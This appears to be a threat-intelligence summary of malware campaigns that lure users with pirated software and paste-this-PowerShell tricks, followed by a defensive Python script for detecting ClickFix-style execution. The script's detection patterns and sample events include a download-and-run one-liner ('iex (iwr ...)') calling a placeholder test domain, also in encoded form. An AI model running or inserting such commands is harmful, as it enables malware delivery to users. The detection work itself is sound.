TLDR:
- Cybercriminals are luring users with offers of free or pirated versions of commercial software to deploy malware such as Hijack Loader and Vidar Stealer.
- The attackers rely on social engineering, including tricking users into copying and pasting PowerShell commands and opening misleading HTML attachments, so that victims download and execute the malicious code themselves.
Article Summary:
Threat actors are luring users with offers of free software that actually deliver malware loaders such as Hijack Loader and information stealers such as Vidar Stealer. The attacks start with a password-protected archive posing as the legitimate software; opening it leads to the execution of a malicious binary. The malware uses DLL side-loading and privilege escalation to evade detection and then drops additional payloads, including cryptocurrency miners. Related cybercrime campaigns, such as ClearFake and ClickFix, also rely on social engineering, user-pasted PowerShell scripts, and HTML attachments to distribute Lumma Stealer, Amadey Loader, and the XMRig miner. The distribution of NetSupport RAT through the same channels shows that attackers keep updating their attack chains even though each still depends on user interaction. These threats are hard to detect because the payloads run under legitimate processes such as PowerShell and the initial execution is carried out manually by the victim, so it resembles ordinary user activity. The SolarMarker campaign impersonates legitimate websites and manipulates search engine results (SEO poisoning) to deliver information-stealing malware. Users should be cautious, avoid deceptive links, and never paste commands from a web page or document into PowerShell.
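The detection difficulty above comes from the shape of the attack: the victim, not a dropper, launches a legitimate script host. One way to catch that is to look at the launch context rather than the binary. The following is an added example written for this summary, not code from the article or from any of the named campaigns. It runs a few heuristics over constructed process-creation events (Sysmon EID 1 or Windows 4688 style parent/child/command line). The parent lists, the flag patterns, the assumption that a pasted ClickFix command shows up as explorer.exe spawning powershell.exe, and the rule that an HTML attachment is handed to mshta.exe are all assumptions made for the demo; none of them is stated on the page.

```python
"""Added example (not from the article): ClickFix-style execution heuristics
run over constructed process-creation events.

The payload runs under a legitimate interpreter, so the signal is the launch
context: a script host spawned by a user-facing process (explorer.exe for a
Win+R / console paste, a mail client or browser for an attachment) with flags
a person at a keyboard rarely types by hand. All lists, patterns and sample
events below are assumptions made for this demo.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    parent: str    # parent image name, as in a Sysmon EID 1 / 4688 record
    image: str     # child image name
    cmdline: str   # child command line


@dataclass
class Finding:
    event: ProcEvent
    reasons: List[str]
    decoded: Optional[str]   # decoded -EncodedCommand payload, if any


# Script hosts that live off the land, and user-facing parents (assumed lists).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "outlook.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "winword.exe", "excel.exe"}

# Command-line traits common in pasted loaders and rare in routine admin use.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    # download-and-invoke in one line: iex (iwr ...), iex (New-Object Net.WebClient).DownloadString(...)
    "download_and_run": re.compile(
        r"\b(?:iex|invoke-expression)\b[\s\S]*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
        re.I),
    # mshta given an HTML/HTA file (assumes attachments reach mshta.exe; not stated in the article)
    "mshta_html": re.compile(r"^mshta(?:\.exe)?\s+.*\.(?:hta|html?)\b", re.I),
}
_ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = _ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcEvent) -> Optional[Finding]:
    """Flag an interpreter launched from a user-facing parent with loader-like flags."""
    if event.image.lower() not in INTERPRETERS:
        return None
    if event.parent.lower() not in INTERACTIVE_PARENTS:
        return None            # service/scheduler parents are handled by other rules
    decoded = decode_encoded_command(event.cmdline)
    # Match patterns against the decoded payload too, so encoding does not hide iex/iwr.
    text = event.cmdline if decoded is None else f"{event.cmdline} {decoded}"
    reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    return Finding(event, reasons, decoded) if reasons else None


def scan(events: List[ProcEvent]) -> List[Finding]:
    return [f for f in map(analyze, events) if f is not None]


# Constructed sample events (hypothetical; example.invalid is a reserved test domain).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -NoProfile -EncodedCommand " + encode_ps("iex (iwr http://example.invalid/x)")),
    ProcEvent("outlook.exe", "mshta.exe", r"mshta.exe C:\Users\u\Downloads\invoice.html"),
    ProcEvent("services.exe", "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.event.parent} -> {f.event.image}: {', '.join(f.reasons)}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

On real telemetry the same rule should be fed the decoded command line, as done here, because `-EncodedCommand` is exactly how the pasted one-liners hide `iex`/`iwr` from naive string matching; the scheduled-task launch in the fourth event is deliberately left alone so that a noisy rule does not bury the interactive-parent signal the article points at.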